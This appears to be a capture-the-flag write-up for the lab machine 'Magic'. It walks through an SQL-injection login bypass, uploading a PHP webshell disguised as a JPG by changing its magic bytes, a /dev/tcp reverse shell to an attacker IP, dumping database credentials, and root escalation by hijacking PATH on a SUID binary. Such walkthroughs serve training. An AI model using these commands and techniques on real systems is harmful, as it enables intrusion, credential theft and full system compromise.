Magic
Last updated
Was this helpful?
Last updated
Was this helpful?
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.185 -oN allPorts
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80 10.10.10.185 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.
Let's take a look at the website.
We'll see a message saying that in order to be able to upload images, we'll have to log in. Let's try it.
At this point, I tried to log in as the user ' or 1=1-- - and the test password, so if the login panel is vulnerable to SQL Injection, we'll pass through the login panel.
And it worked.
Now, let's create a webshell with the following PHP code, and then we'll try to upload it to the website.
Now, before uploading it to the website, let's name that file webshell.php.jpg, so the website will think we are uploading a JPG image. If we upload the file, we'll get the following message.
One thing we could try to do, is to change the magic numbers of the file.
Then, let's use the hexeditor tool, and change the first 8 values from 61 61 61 61 to FF D8 FF DB.
hexeditor webshell.php.jpg
Then save it with Ctrl+X. If now we check the type of file, we can see that it is supposedly a JPG image.
file webshell.php.jpg
Now, let's try to upload it to the website.
And we'll see that it is uploaded properly.
We can see from the source code of the main page, that the images are stored in the /images/uploads/ directory.
So, if now we access the following URL, we'll see our webshell, and we'll be able to execute commands via the cmd GET parameter.
Time to get a shell. First, let's set a netcat listener on port 4444.
nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
And then, if we access the following URL, we should get a shell as the www-data user.
http://10.10.10.185/images/uploads/webshell.php.jpg?cmd=bash -c "bash -i >%26 /dev/tcp/10.10.14.9/4444 0>%261"
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
If now we enumerate the system, we'll find the db.php5 file in the /var/www/Magic/ directory. That file contains some database credentials.
cat /var/www/Magic/db.php5
But if we try to use mysql, we'll see that it is not installed on the system.
mysql
But, if we write mysql on the terminal, and hit the Tab button a few times, we'll see a bunch of tools.
mysql TAB TAB
One of them will allow us to enumerate a database, it is the mysqldump tool.
mysqldump -u theseus -piamkingtheseus Magic
-u user for login.
-p password for login.
And we can see that at some point there was an insert statement with the username admin, and the password Th3s3usW4sK1ng. Let's list the users on the system.
cat /etc/passwd | grep sh
As we have a password, let's try to become the theseus user with that password. Then we could grab the user flag.
su theseus
If we check the groups that the user theseus is member of, we'll see that it is member of the users group.
id
Now, let's find for files on the system, which group is the users group.
find / -group users 2>/dev/null
And we see one binary. If we take a look at the file permissions, we'll see that the group owner is the users group, and the owner user is root. We can also see that the binary has the SUID permissions enabled, which means that when we execute the binary, we'll be executing it as the root user. Let's try to see the strings of the binary.
strings /bin/sysinfo
We'll see that at some point, the binary is executing the free command, but without the absolute path. We could try to modify the $PATH variable, so that when the binary executes the free command as the root user, it will execute a free script that we'll make in the /tmp directory. First, let's create the free file with the following content on the /tmp directory.
nano /tmp/free
chmod +x /tmp/free
If the script that we just made is executed by the root user, the /bin/bash binary will have the SUID permission set. Now, let's modify the $PATH variable, so that when the /bin/sysinfo binary is executed it will execute our script on the /tmp directory.
export PATH=/tmp:$PATH
echo $PATH
If now we execute the /bin/sysinfo binary, we'll see that the /bin/bash binary will have the SUID permission set.
/bin/sysinfo
ls -l /bin/bash
Now, all we have to do is spawn a shell as the root user, and reap the harvest and take the root flag.
bash -p
If we check the JPG magic numbers on this , we'll see that the magic numbers for JPG are FF D8 FF DB. First, let's add a bunch of a characters at the beginning of the webshell.
